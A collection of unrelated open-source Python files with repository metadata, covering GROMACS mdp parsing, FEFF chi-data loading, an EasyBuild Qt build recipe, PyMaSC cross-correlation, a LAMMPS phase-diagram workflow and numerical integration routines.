    # modern Python versions.
    COMMENT = re.compile(r"""\s*;\s*(?P<value>.*)""")           # eat initial ws
    # see regex in cbook.edit_mdp()
    PARAMETER = re.compile(r"""
                            \s*(?P<parameter>[^=]+?)\s*=\s*    # parameter (ws-stripped), before '='
                            (?P<value>[^;]*)                   # value (stop before comment=;)
                            (?P<comment>\s*;.*)?               # optional comment
                            """, re.VERBOSE)

    def __init__(self, filename=None, autoconvert=True, **kwargs):
        """Initialize mdp structure.

        :Arguments:
          *filename*
              read from mdp file
          *autoconvert* : boolean
              ``True`` converts numerical values to python numerical types;
              ``False`` keeps everything as strings [``True``]
          *kwargs*
              Populate the MDP with key=value pairs. (NO SANITY CHECKS; and also
              does not work for keys that are not legal python variable names such
              as anything that includes a minus '-' sign or starts with a number).
        """
        super(MDP, self).__init__(**kwargs)  # can use kwargs to set dict! (but no sanity checks!)
        self.autoconvert = autoconvert
        if filename is not None:
            self._init_filename(filename)
            self.read(filename)

    def _transform(self, value):
        """Convert *value* to a python type if autoconversion is enabled."""
        if self.autoconvert:
            return utilities.autoconvert(value)
        else:
            return value.rstrip()

    def read(self, filename=None):
        """Read and parse mdp file *filename*.

        Blank lines and comments are preserved under generated keys
        ("B0001"..., "C0001"...) so that :meth:`write` can round-trip the
        file. Unparseable lines raise :exc:`ParseError`.
        """
        self._init_filename(filename)

        # Key generators for blank lines and comments; only the first letter
        # ('B'/'C') matters to write(), the counter just keeps keys unique.
        def BLANK(i):
            return "B{0:04d}".format(i)

        def COMMENT(i):
            return "C{0:04d}".format(i)

        data = odict()
        iblank = icomment = 0
        with open(self.real_filename) as mdp:
            for line in mdp:
                line = line.strip()
                if len(line) == 0:
                    iblank += 1
                    data[BLANK(iblank)] = ''
                    continue
                m = self.COMMENT.match(line)
                if m:
                    icomment += 1
                    data[COMMENT(icomment)] = m.group('value')
                    continue
                # parameter
                m = self.PARAMETER.match(line)
                if m:
                    # check for comments after parameter?? -- currently discarded
                    parameter = m.group('parameter')
                    value = self._transform(m.group('value'))
                    data[parameter] = value
                else:
                    errmsg = '{filename!r}: unknown line in mdp file, {line!r}'.format(**vars())
                    self.logger.error(errmsg)
                    raise ParseError(errmsg)
        super(MDP, self).update(data)

    def write(self, filename=None, skipempty=False):
        """Write mdp file to *filename*.

        :Keywords:
           *filename*
               output mdp file; default is the filename the mdp
               was read from
           *skipempty* : boolean
               ``True`` removes any parameter lines from output that
               contain empty values [``False``]

        .. Note:: Overwrites the file that the mdp was read from if no
                  *filename* supplied.
        """
        with open(self.filename(filename, ext='mdp'), 'w') as mdp:
            for k, v in self.items():
                if k[0] == 'B':        # blank line
                    mdp.write("\n")
                elif k[0] == 'C':      # comment
                    mdp.write("; {v!s}\n".format(**vars()))
                else:                  # parameter = value
                    if skipempty and (v == '' or v is None):
                        continue
                    if isinstance(v, six.string_types) or not hasattr(v, '__iter__'):
                        mdp.write("{k!s} = {v!s}\n".format(**vars()))
                    else:
                        # iterable value: emit space-separated items
                        mdp.write("{} = {}\n".format(k, ' '.join(map(str, v))))
|
Becksteinlab/GromacsWrapper
|
gromacs/fileformats/mdp.py
|
Python
|
gpl-3.0
| 5,815
|
[
"Gromacs"
] |
915c6ed871d25bb58e4fe17c1a05fe8257d7dba8f89d722df50db73cd14e10ed
|
'''
* Created by Zhenia Syryanyy (Yevgen Syryanyy)
* e-mail: yuginboy@gmail.com
* License: this code is under GPL license
* Last modified: 2017-02-27
'''
import numpy as np
import os
from feff.libs.dir_and_file_operations import get_folder_name, runningScriptDir
from feff.libs.feff_processing import xftf
def load_experimental_chi_data(file_path):
    """Load an experimental chi(k) data file and resample it onto the
    standard k-grid 0..20 with step 0.05 via linear interpolation.

    :param file_path: path to a two-column text file (k, chi).
    :return: (401, 2) ndarray with column 0 = k-grid, column 1 = chi(k).
    """
    raw = np.loadtxt(file_path, float)
    k_grid = np.r_[0:20.05:0.05]
    resampled = np.zeros((len(k_grid), 2))
    resampled[:, 0] = k_grid
    # Linearly interpolate the measured chi onto the uniform grid so every
    # point of the standard grid has a value.
    resampled[:, 1] = np.interp(k_grid, raw[:, 0], raw[:, 1])
    return resampled
def load_chi_data(file_path):
    """Load a theoretically calculated chi(k) file onto the standard k-grid.

    FEFF output files may or may not include the k=0 point, so the number of
    rows decides how the data is placed on the 401-point grid; much shorter
    files are treated as experimental data and interpolated instead.

    :param file_path: path to a two-column text file (k, chi).
    :return: (401, 2) ndarray with column 0 = k-grid, column 1 = chi(k).
    """
    k_grid = np.r_[0:20.05:0.05]
    n_rows = len(k_grid)
    chi = np.zeros((n_rows, 2))
    data = np.loadtxt(file_path, float)
    chi[:, 0] = k_grid
    n_data = len(data[:, 0])
    if n_data == n_rows - 1:
        # file is missing the k=0 point: leave chi[0, 1] at zero
        chi[1:, 1] = data[:, 1]
        # print('theory data without 0-k point has been loaded')
    elif n_data == n_rows:
        chi[:, 1] = data[:, 1]
        # print('theory data has been loaded')
    elif n_data < n_rows - 1:
        # too few points for a direct copy: assume experimental data
        chi = load_experimental_chi_data(file_path)
        # print('experimental data has been loaded')
    else:
        print('you have unexpected numbers of rows in your output files')
        print('input file name is: ', file_path)
        print('number of elements is: ', len(data[:, 0]), ' the first k-element is: ', data[0, 0])
    return chi
def load_and_apply_xftf(file_path, user='PK'):
    """Load chi(k) from *file_path* and return its Fourier transform.

    :param file_path: chi data file, parsed by :func:`load_chi_data`.
    :param user: user profile forwarded to :func:`xftf` (default 'PK').
    :return: whatever :func:`xftf` returns for the loaded (k, chi) columns.
    """
    chi = load_chi_data(file_path)
    return xftf(chi[:, 0], chi[:, 1], user=user)
if __name__ == '__main__':
    # Manual smoke test: load two theoretical chi files and one experimental
    # file, then plot all three curves on one figure.
    print('-> you run ', __file__, ' file in a main mode')
    # NOTE(review): machine-specific absolute paths -- only work on the
    # original author's VirtualBox share.
    file_path1 = r'/home/yugin/VirtualboxShare/GaMnO/1mono1SR2VasVga2_6/feff__0001/chi_1mono1SR2VasVga2_6_000002_00001.dat'
    file_path2 = r'/home/yugin/VirtualboxShare/GaMnO/1mono1SR2VasVga2_6/feff__0001/chi_1mono1SR2VasVga2_6_000131_00130.dat'
    exp_data_path2 = os.path.join(get_folder_name(runningScriptDir), 'data', '350.chik')

    chi1 = load_chi_data(file_path1)
    chi2 = load_chi_data(file_path2)
    chi3 = load_chi_data(exp_data_path2)

    # Imported lazily so the module can be used without a display/matplotlib.
    import matplotlib.pyplot as plt
    chi = chi1
    plt.plot(chi[:, 0], chi[:, 1],)
    chi = chi2
    plt.plot(chi[:, 0], chi[:, 1],)
    chi = chi3
    plt.plot(chi[:, 0], chi[:, 1],)
    plt.show()
    print('finish')
|
yuginboy/from_GULP_to_FEFF
|
feff/libs/load_chi_data_file.py
|
Python
|
gpl-3.0
| 2,623
|
[
"FEFF"
] |
41c6ef36ffa290bd4830ebe9dc41f4c41378f3789018086ec692b1e2a5825af5
|
##
# Copyright 2013 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing Qt, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
import os
import easybuild.tools.toolchain as toolchain
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.run import run_cmd_qa
class EB_Qt(ConfigureMake):
    """
    Support for building and installing Qt.
    """

    def configure_step(self):
        """Configure Qt using interactive `configure` script.

        Selects a release build and a platform spec based on the toolchain
        compiler family, then drives the interactive configure script with
        canned question/answer pairs.

        :raise EasyBuildError: if the compiler family is not GCC or Intel.
        """
        self.cfg.update('configopts', '-release')

        comp_fam = self.toolchain.comp_family()
        if comp_fam in [toolchain.GCC]:  #@UndefinedVariable
            self.cfg.update('configopts', '-platform linux-g++-64')
        elif comp_fam in [toolchain.INTELCOMP]:  #@UndefinedVariable
            self.cfg.update('configopts', '-platform linux-icc-64')
        else:
            raise EasyBuildError("Don't know which platform to set based on compiler family.")

        cmd = "%s ./configure --prefix=%s %s" % (self.cfg['preconfigopts'], self.installdir, self.cfg['configopts'])

        # questions the interactive configure script asks, with our answers
        qa = {
            "Type 'o' if you want to use the Open Source Edition.": 'o',
            "Do you accept the terms of either license?": 'yes',
        }
        # output patterns that are informational only and require no answer
        no_qa = [
            "for .*pro",
            "Reading .*",
            "WARNING .*",
            "Project MESSAGE:.*",
            "rm -f .*",
            'Creating qmake...',
        ]
        # $CXX may be unset in the environment; the original unconditional
        # os.getenv('CXX').replace(...) crashed with AttributeError then.
        cxx = os.getenv('CXX')
        if cxx:
            no_qa.append(r"%s.*" % cxx.replace('+', '\\+'))  # need to escape + in 'g++'

        run_cmd_qa(cmd, qa, no_qa=no_qa, log_all=True, simple=True)

    def build_step(self):
        """Set $LD_LIBRARY_PATH before calling make, to ensure that all required libraries are found during linking."""
        # cfr. https://elist.ornl.gov/pipermail/visit-developers/2011-September/010063.html
        self.cfg.update('prebuildopts', 'LD_LIBRARY_PATH=%s:$LD_LIBRARY_PATH' % os.path.join(self.cfg['start_dir'], 'lib'))

        super(EB_Qt, self).build_step()

    def sanity_check_step(self):
        """Custom sanity check for Qt: core library plus standard directories."""
        custom_paths = {
            'files': ["lib/libQtCore.so"],
            'dirs': ["bin", "include", "plugins"],
        }
        super(EB_Qt, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/modules
|
easybuild/easybuild-easyblocks/easybuild/easyblocks/q/qt.py
|
Python
|
mit
| 3,382
|
[
"VisIt"
] |
203d76f2a58fc02d21e5e4a976d7716e02c5a3f78fd0d994e76148721bff01f3
|
import logging
from multiprocessing import Queue, Lock
import pysam
from PyMaSC.handler.masc_noindex_worker import SingleProcessCalculator
from PyMaSC.handler.masc_worker import NaiveCCCalcWorker, MSCCCalcWorker, NCCandMSCCCalcWorker
from PyMaSC.core.readlen import estimate_readlen
from PyMaSC.utils.progress import MultiLineProgressManager, ProgressBar, ProgressHook
from PyMaSC.utils.calc import exec_worker_pool, filter_chroms
logger = logging.getLogger(__name__)
class InputUnseekable(Exception):
    """Raised when an operation needs to re-read an unseekable input (e.g. stdin)."""
class NothingToCalc(Exception):
    """Raised when chromosome filtering leaves no target references to process."""
class CCCalcHandler(object):
    """Orchestrates cross-correlation (NCC) and mappability-sensitive
    cross-correlation (MSCC) calculations over a SAM/BAM alignment file.

    Dispatches the per-chromosome work either to a single-process calculator
    or to a pool of worker processes (one queue pair + a logging lock), and
    collects the per-chromosome sums/bins into the ``ref2*`` dictionaries.
    """

    def __init__(self, path, esttype, max_shift, mapq_criteria, nworker=1, skip_ncc=False, chromfilter=None):
        """Open *path* with pysam, filter target chromosomes, and set up state.

        :param path: SAM/BAM file path ('-' for stdin).
        :param esttype: read-length estimation type, forwarded to
            estimate_readlen.
        :param max_shift: maximum shift (bp) for the cross-correlation.
        :param mapq_criteria: minimum MAPQ for reads to be counted.
        :param nworker: number of worker processes (falls back to 1 if the
            alignment file has no index).
        :param skip_ncc: skip the naive cross-correlation calculation.
        :param chromfilter: chromosome include/exclude spec for filter_chroms.
        :raises ValueError: from pysam when the file defines no sequences.
        :raises NothingToCalc: when filtering leaves no chromosomes.
        """
        self.path = path
        self.esttype = esttype
        self.max_shift = max_shift
        self.mapq_criteria = mapq_criteria
        self.nworker = nworker
        self.skip_ncc = skip_ncc

        #
        try:
            self.align_file = pysam.AlignmentFile(path)
        except ValueError:
            logger.error("File has no sequences defined.")
            raise

        #
        target_references = filter_chroms(self.align_file.references, chromfilter)
        if not target_references:
            logger.error("There is no targeted chromosomes.")
            raise NothingToCalc

        # Keep references/lengths in the file's own order, restricted to targets.
        self.references = []
        self.lengths = []
        need_warning = False  # NOTE(review): set but never used -- dead variable?
        for reference, length in zip(self.align_file.references, self.align_file.lengths):
            if reference in target_references:
                self.references.append(reference)
                self.lengths.append(length)

        # Multi-process mode needs an index so workers can seek independently;
        # without one, silently degrade to a single process.
        # (NOTE(review): "multi-processng" typo is in the emitted log string.)
        if not self.align_file.has_index() and self.nworker > 1:
            logger.error("Need indexed alignment file for multi-processng. "
                         "Calculation will be executed by single process.")
            self.nworker = 1
        elif self.nworker > 1:
            # workers reopen the file themselves; the parent handle is not needed
            self.align_file.close()

        # per-chromosome results of the naive cross-correlation
        self.ref2forward_sum = {}
        self.ref2reverse_sum = {}
        self.ref2ccbins = {}

        # per-chromosome results of the mappability-sensitive calculation
        self.mappable_ref2forward_sum = {}
        self.mappable_ref2reverse_sum = {}
        self.mappable_ref2ccbins = {}
        self.ref2mappable_len = {}

        # filled in later by set_readlen() / set_mappability_handler()
        self.read_len = None
        self.mappability_handler = None

    def set_readlen(self, readlen=None):
        """Set the read length, estimating it from the input if not given.

        :param readlen: explicit read length; when falsy it is estimated
            from the alignment file (which requires a seekable input).
        :raises InputUnseekable: when estimation is needed but input is stdin.
        :raises ValueError: when the read length exceeds max_shift.
        """
        if readlen:
            self.read_len = readlen
        elif self.path == '-':
            logger.error("Cannot execute read length checking for unseekable input.")
            raise InputUnseekable
        else:
            logger.info("Check read length... : " + self.path)
            self.read_len = estimate_readlen(self.path, self.esttype, self.mapq_criteria)

        if self.read_len > self.max_shift:
            logger.error("Read lengh ({}) seems to be longer than shift size ({}).".format(
                self.read_len, self.max_shift
            ))
            raise ValueError

    def set_mappability_handler(self, mappability_handler):
        """Attach a mappability (BigWig) handler and cross-check reference sizes."""
        self.mappability_handler = mappability_handler
        bw_chromsizes = self.mappability_handler.chromsizes
        for i, reference in enumerate(self.references):
            if reference not in bw_chromsizes:
                logger.debug("mappability for '{}' not found".format(reference))
                continue
            self._compare_refsize(reference, bw_chromsizes[reference])

    def _compare_refsize(self, reference, bw_chr_size):
        """Warn on SAM/BAM vs BigWig length mismatch; keep the longer length."""
        i = self.references.index(reference)
        bam_chr_size = self.lengths[i]
        if bw_chr_size != bam_chr_size:
            logger.warning("'{}' reference length mismatch: SAM/BAM -> {:,}, "
                           "BigWig -> {:,}".format(reference, bam_chr_size, bw_chr_size))
            if bam_chr_size < bw_chr_size:
                logger.warning("Use longer length '{:d}' for '{}' anyway".format(
                    bw_chr_size, reference))
                self.lengths[i] = bw_chr_size

    def run_calcuration(self):
        """Run the calculation, multi-process when nworker > 1.

        (NOTE(review): "calcuration" is a typo but part of the public API --
        renaming would break callers.)
        """
        if self.nworker > 1:
            # to avoid interfering mappability progress bar with multiline progress bar
            ProgressBar.global_switch = False
            ProgressHook.global_switch = True
            self._run_multiprocess_calcuration()
        else:
            self._run_singleprocess_calculation()

    def _run_singleprocess_calculation(self):
        """Run everything in-process and copy the calculator's results over."""
        worker = SingleProcessCalculator(
            self.align_file, self.mapq_criteria, self.max_shift, self.references,
            self.lengths, self.read_len, self.mappability_handler, self.skip_ncc
        )

        worker.run()

        if not self.skip_ncc:
            self.ref2forward_sum = worker.nccc.ref2forward_sum
            self.ref2reverse_sum = worker.nccc.ref2reverse_sum
            self.ref2ccbins = worker.nccc.ref2ccbins

        if worker.mscc:
            self.mappable_ref2forward_sum = worker.mscc.ref2forward_sum
            self.mappable_ref2reverse_sum = worker.mscc.ref2reverse_sum
            self.mappable_ref2ccbins = worker.mscc.ref2ccbins

        self._calc_unsolved_mappabilty()

    def _run_multiprocess_calcuration(self):
        """Spawn worker processes and gather per-chromosome results.

        The worker class depends on whether mappability data is available and
        whether the naive calculation is skipped.
        """
        self._order_queue = Queue()
        self._report_queue = Queue()
        self._logger_lock = Lock()

        worker_args = [self._order_queue, self._report_queue, self._logger_lock, self.path,
                       self.mapq_criteria, self.max_shift, self.references, self.lengths]

        if self.mappability_handler:
            worker_args += [self.mappability_handler.path, self.read_len,
                            self.mappability_handler.chrom2mappable_len]
            if self.skip_ncc:
                worker_class = MSCCCalcWorker
            else:
                worker_class = NCCandMSCCCalcWorker
        else:
            worker_class = NaiveCCCalcWorker

        # never spawn more workers than there are chromosomes to process
        workers = [worker_class(*worker_args)
                   for _ in range(min(self.nworker, len(self.references)))]

        self._run_calculation_with_workers(workers)
        self._calc_unsolved_mappabilty()

    def _run_calculation_with_workers(self, workers):
        """Drain the report queue until every chromosome has finished.

        A report tagged with chrom=None is a progress update; otherwise it is
        a final per-chromosome result.
        """
        _chrom2finished = {c: False for c in self.references}
        progress = MultiLineProgressManager()

        with exec_worker_pool(workers, self.references, self._order_queue):
            while True:
                chrom, obj = self._report_queue.get()
                if chrom is None:  # update progress
                    chrom, body = obj
                    with self._logger_lock:
                        progress.update(chrom, body)
                else:
                    mappable_len, cc_stats, masc_stats = obj
                    self._receive_results(chrom, mappable_len, cc_stats, masc_stats)
                    _chrom2finished[chrom] = True
                    if all(_chrom2finished.values()):
                        break
                    with self._logger_lock:
                        progress.erase(chrom)

        progress.clean()

    def _receive_results(self, chrom, mappable_len, cc_stats, masc_stats):
        """Store one chromosome's NCC/MSCC results, skipping missing pieces."""
        f_sum, r_sum, ccbins = cc_stats
        mf_sum, mr_sum, mccbins = masc_stats

        if mappable_len is not None:
            self.mappability_handler.chrom2mappable_len[chrom] = mappable_len
            self.mappability_handler.chrom2is_called[chrom] = True

        if None not in (f_sum, r_sum, ccbins):
            self.ref2forward_sum[chrom] = f_sum
            self.ref2reverse_sum[chrom] = r_sum
            self.ref2ccbins[chrom] = ccbins

        if None not in (mappable_len, mf_sum, mr_sum, mccbins):
            self.mappable_ref2forward_sum[chrom] = mf_sum
            self.mappable_ref2reverse_sum[chrom] = mr_sum
            self.mappable_ref2ccbins[chrom] = mccbins

    def _calc_unsolved_mappabilty(self):
        """Finalize mappability: compute remaining lengths and publish them."""
        if self.mappability_handler is not None:
            if not self.mappability_handler.is_called:
                self.mappability_handler.is_called = all(
                    self.mappability_handler.chrom2is_called.values()
                )
                self.mappability_handler.calc_mappability()
            self.ref2mappable_len = self.mappability_handler.chrom2mappable_len
|
ronin-gw/PyMaSC
|
PyMaSC/handler/masc.py
|
Python
|
mit
| 8,168
|
[
"pysam"
] |
8b3518eb625de32f9b5b7cf288e76d43038ff72b442d0f10d2aa5aff0abca755
|
#!/usr/bin/env python
#coding=utf-8
'''
Created on 01 Ιουλ 2011
@author: tedlaz
'''
class Beverage():
    """Base component of the decorator-pattern demo: a drink with a
    description and a cost."""

    def __init__(self):
        self.desc = 'unknown'

    def getDesc(self):
        """Return the beverage description."""
        return self.desc

    def cost(self):
        """Return the price; the base beverage costs nothing."""
        return 0
class Espresso(Beverage):
    """Concrete beverage: a plain espresso."""

    def __init__(self):
        self.desc = 'Espresso'

    def cost(self):
        """Return the espresso base price."""
        return 0.99
class Mocha():
    """Decorator that wraps any beverage-like object and adds Mocha."""

    def __init__(self, bev):
        # keep a reference to the wrapped beverage (decorator pattern)
        self.beverage = bev

    def getDesc(self):
        """Return the wrapped description with ', Mocha' appended."""
        return "{}, Mocha".format(self.beverage.getDesc())

    def cost(self):
        """Return the wrapped cost plus the Mocha surcharge."""
        return self.beverage.cost() + 0.20
class ika():
    """IKA (social security) contribution rates, in percent.

    ``perg`` presumably is the employer share and ``peti`` the employee
    share -- TODO confirm against the rest of the project.
    """

    def __init__(self):
        self.per = ''
        self.peti = 10
        self.perg = 20
        self.pika = 30

    def getFromDB(self, no=0):
        """Replace the defaults with 'database' values (hard-coded demo)."""
        self.per = 'IKA Mikta'
        self.perg = 10
        self.peti = 20
        self.pika = self.perg + self.peti

    def calc(self, poso):
        """Return (total, employer, employee) contributions on amount *poso*."""
        total = poso * self.pika / 100
        employer = poso * self.perg / 100
        return total, employer, total - employer
class eidikotita():
    """Employee specialty (job category) with a default base salary and an
    attached IKA rate object."""

    def __init__(self, name, isMisthotos=True):
        self.per = name
        self.isMisthotos = isMisthotos
        self.basikosMisthos = 540.24  # default base salary
        self.cod = ''
        self.ika = ika()

    def calcIKA(self):
        """Return (total, employer, employee) IKA contributions for the base salary."""
        return self.ika.calc(self.basikosMisthos)

    def getFromDB(self, no=0):
        """Placeholder: load specialty data from a database (not implemented)."""
        pass
class parousia():
    """Attendance/earnings record: a pay category measured in some unit
    (days by default)."""

    def __init__(self):
        self.per = 'Taktikes apodoxes'
        self.monadaMetrisis = 'meres'
        self.posotis = 25

    def calcApodoxes(self, erg):
        """Compute earnings for employee *erg* (stub: always 0)."""
        return 0

    def getFromDB(self, no=0):
        """Placeholder: load attendance data from a database (not implemented)."""
        pass
class erg():
    """Employee demo object with hard-coded default identity fields."""

    def __init__(self):
        self.onoma = 'Ted'
        self.eponymo = 'Lazaros'
        self.eidikotita = eidikotita('logistis')

    def getFromDB(self, no):
        """Overwrite the name fields with 'database' values (hard-coded demo)."""
        self.onoma = 'Popi'
        self.eponymo = 'Dazea'
if __name__ == '__main__':
    # Decorator-pattern demo: an espresso wrapped in two Mocha add-ons.
    #ted = erg()
    #print ted.eidikotita.per
    #print ted.eidikotita.calcIKA()
    #print ted.eidikotita.ika.calc(1500)
    es = Espresso()
    es = Mocha(es)
    es = Mocha(es)
    # Parenthesized single-argument print works on both Python 2 and 3;
    # the original bare "print expr" statements were Python-2-only.
    print(es.getDesc())
    print(es.cost())
|
tedlaz/pyted
|
misthodosia/pyMisthodosia/src/erg.py
|
Python
|
gpl-3.0
| 2,076
|
[
"ESPResSo"
] |
1d822a6c2beef658339243be56182c55b779c73c3b382aca11960616ff7375eb
|
"""This module contains all of the important meta-information for
Hypatia such as the author's name, the copyright and license, status,
and so on.
"""
__author__ = "Lillian Lemmer"
__copyright__ = "Copyright 2015 Lillian Lemmer"
__credits__ = ["Lillian Lemmer"]
__license__ = "MIT"
__maintainer__ = __author__
__site__ = "http://lillian-lemmer.github.io/hypatia/"
__email__ = "lillian.lynn.lemmer@gmail.com"
__status__ = "Development"
__contributors__ = [
"Lillian Lemmer",
"Brian Houston Morrow",
"Eric James Michael Ritz"
]
__version__ = '0.2.26'
|
Applemann/hypatia
|
hypatia/__init__.py
|
Python
|
mit
| 632
|
[
"Brian"
] |
33128007ba8dbc98a7ab5c7d72f56ed5746c1566b74eb388cc319140776c3272
|
# coding: utf-8
# Copyright (c) Henniggroup.
# Distributed under the terms of the MIT License.
from __future__ import division, print_function, unicode_literals, \
absolute_import
"""
Sample LAMMPS workflow that runs MD calculations for a bunch of structures and
subsequently generate their phasediagram.
"""
from math import ceil
import matplotlib
matplotlib.use('Agg')
from pymatgen.core.composition import Composition
from pymatgen.phasediagram.entries import PDEntry
from pymatgen.phasediagram.pdmaker import PhaseDiagram
from pymatgen.phasediagram.plotter import PDPlotter
from mpinterfaces import get_struct_from_mp
from mpinterfaces.lammps import CalibrateLammps
from mpinterfaces.utils import *
# all the info/warnings/outputs redirected to the log file:
# lammps_Al_O.log
logger = get_logger('lammps_Al_O')

# list of structures from materialsproject
# NOTE(review): this hits the Materials Project web API at import time --
# requires network access and (presumably) an API key; TODO confirm.
structures = get_struct_from_mp('Al-O', all_structs=True)
# scale each structure up to a supercell of roughly scell_size Angstrom
# per lattice direction
scell_size = 12
for s in structures:
    a, b, c = s.lattice.abc
    s.make_supercell([ceil(scell_size / a),
                      ceil(scell_size / b),
                      ceil(scell_size / c)])
# lammps input parameters
parameters = {'atom_style': 'charge',
              'charges': {'Al': 0, 'O': 0},
              'minimize': '1.0e-13 1.0e-20 1000 10000',
              'fix': ['fix_nve all nve',
                      '1 all box/relax aniso 0.0 vmax 0.001',
                      '1a all qeq/comb 1 0.0001 file fq.out']}
# list of pair styles
pair_styles = ['comb3 polar_off']
# list of pair coefficient files
# this file must be in the folder where this script is run
pair_coeff_files = [os.path.join(os.getcwd(), "ffield.comb3")]
def step1(**kwargs):
    """Set up and submit all LAMMPS jobs.

    Builds the calibration matrix over structures, pair styles and pair
    coefficient files, submits the jobs to the queue, and returns the list
    of checkpoint files for the next workflow step.
    """
    knobs = OrderedDict([
        ('STRUCTURES', structures),
        ('PAIR_STYLE', pair_styles),
        ('PAIR_COEFF', pair_coeff_files),
    ])

    # job directory and run settings
    job_dir = 'lammps_job'
    nprocs = 4
    nnodes = 1
    walltime = '00:15:00'
    mem = 200
    job_bin = '/home/km468/Software/lammps/src/lmp_ufhpc < inp'
    qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,
                                      walltime=walltime,
                                      job_bin=job_bin, mem=mem)

    # setup calibration jobs and run
    chkpt_file = 'step1.json'
    cal = CalibrateLammps(parameters, turn_knobs=knobs,
                          qadapter=qadapter, job_cmd=job_cmd,
                          job_dir=job_dir, is_matrix=True,
                          checkpoint_file=chkpt_file,
                          cal_logger=logger)
    cal.setup()
    cal.run()

    return [chkpt_file]
def step2(**kwargs):
    """Post-process the finished jobs and generate the Al-O phase diagram.

    Reads the checkpoint written by step1, collects (composition, energy)
    entries for every job plus the two elemental endpoints, and writes the
    phase diagram image to 'Al_O_phasediagram.jpg'.
    """
    chkfile = kwargs['checkpoint_files'][0]
    all_jobs = jobs_from_file(chkfile)

    # endpoint reference energies for elemental Al and O
    entries = [
        PDEntry(Composition("Al1O0"), -3.36),
        PDEntry(Composition("Al0O1"), -2.58),
    ]

    # one entry per finished LAMMPS job
    for job in all_jobs:
        entries.append(PDEntry(job.vis.mplmp.structure.composition,
                               job.final_energy))

    pd = PhaseDiagram(entries)
    PDPlotter(pd, show_unstable=True).write_image('Al_O_phasediagram.jpg')
    return None
if __name__ == '__main__':
    # Run the two workflow steps under the polling daemon; `interval` is the
    # poll period passed to launch_daemon -- presumably seconds, TODO confirm.
    steps = [step1, step2]
    interval = 60
    launch_daemon(steps, interval, ld_logger=logger)
|
henniggroup/MPInterfaces
|
examples/workflows/lammps_workflow.py
|
Python
|
mit
| 3,731
|
[
"LAMMPS",
"pymatgen"
] |
a9f716812857ff5eb3fdd5cd3db10f0d1094adc546626e2e0c6f9afef402ae50
|
"""
Computing integrals.
"""
# TODO:
# FIX GAUSSIAN QUADRATURE
# Include error estimates for each method?
import math
import souffle.utils as utl
import souffle.datatypes as dtt
def trapezoidal(f, a, b, n):
    """
    Evaluates the integral of f over [a, b] using the composite trapezoidal
    rule with n subintervals (n+1 sample points).

    The step is signed, so b < a yields the correctly signed integral
    (the original used abs(b - a), which stepped *away* from b and
    integrated the wrong interval when b < a).

    @type f: function
    @param f: function to integrate
    @type a: number
    @param a: start of interval
    @type b: number
    @param b: end of interval
    @type n: number
    @param n: number of subintervals
    @rtype: number
    @return: integral of f between a and b
    """
    a = float(a)
    b = float(b)
    n = int(n)
    # signed step so the nodes a, a+h, ..., b actually span [a, b]
    h = (b - a) / n
    # endpoints carry weight 1/2, interior points weight 1
    s = 0.5 * f(a) + 0.5 * f(b)
    for k in range(1, n):
        s += f(a + k * h)
    return h * s
def simpsons(f, a, b, n):
    """
    Evaluates the integral of f, with endpoints a and b, using the composite
    Simpson's rule with n subintervals.

    @type f: function
    @param f: function to integrate
    @type a: number
    @param a: start of interval
    @type b: number
    @param b: end of interval
    @type n: number
    @param n: number of sample points
    @rtype: number
    @return: integral of f between a and b
    """
    a = float(a)
    b = float(b)
    n = int(n)
    h = (b - a) / n
    # endpoints weight 1; interior points alternate weight 4 (odd index)
    # and 2 (even index)
    total = f(a) + f(b)
    for k in range(1, n):
        coeff = 4.0 if k % 2 else 2.0
        total += coeff * f(a + k * h)
    return 1.0 / 3 * h * total
# TODO
def adaptive_simpsons():
    """Not yet implemented: Simpson's rule with adaptive interval refinement."""
    return
def boole(f, a, b):
    """
    Evaluates the integral of f, with endpoints a and b, using Boole's rule
    (5-point closed Newton-Cotes formula).

    @type f: function
    @param f: function to integrate
    @type a: number
    @param a: start of interval
    @type b: number
    @param b: end of interval
    @rtype: number
    @return: integral of f between a and b
    """
    start = float(a)
    end = float(b)
    h = (end - start) / 4
    # five equally spaced nodes with Boole weights 7, 32, 12, 32, 7
    nodes = [start + i * h for i in range(5)]
    weights = (7, 32, 12, 32, 7)
    return 2 * h / 45 * sum(w * f(x) for w, x in zip(weights, nodes))
# TODO
def romberg():
    """Not yet implemented: Romberg integration (Richardson-extrapolated trapezoids)."""
    return
# TODO
def cubic():
    """Not yet implemented: cubic (degree-3 Newton-Cotes) quadrature."""
    return
# TODO
def quartic():
    """Not yet implemented: quartic (degree-4 Newton-Cotes) quadrature."""
    return
# TODO
def multiple():
    """Not yet implemented: multiple (multi-dimensional) integration."""
    return
|
pauljxtan/mathsci
|
souffle/math/integral.py
|
Python
|
mit
| 2,255
|
[
"Gaussian"
] |
c0e74aed549e1c78120bbbb69550fb67ec23ac5a1f511f549d6f90db772d3987
|
# Public API of this module: every exported name is a module-level string
# constant holding a pre-compiled (minified) JavaScript snippet, defined below.
__all__ = ["GET_FIRST_CLIENT_RECT", \
"GET_LOCATION_IN_VIEW", \
"GET_PAGE_ZOOM", \
"IS_ELEMENT_CLICKABLE", \
"TOUCH_SINGLE_TAP", \
"CLEAR", \
"CLEAR_LOCAL_STORAGE", \
"CLEAR_SESSION_STORAGE", \
"CLICK", \
"EXECUTE_ASYNC_SCRIPT", \
"EXECUTE_SCRIPT", \
"EXECUTE_SQL", \
"FIND_ELEMENT", \
"FIND_ELEMENTS", \
"GET_APPCACHE_STATUS", \
"GET_ATTRIBUTE", \
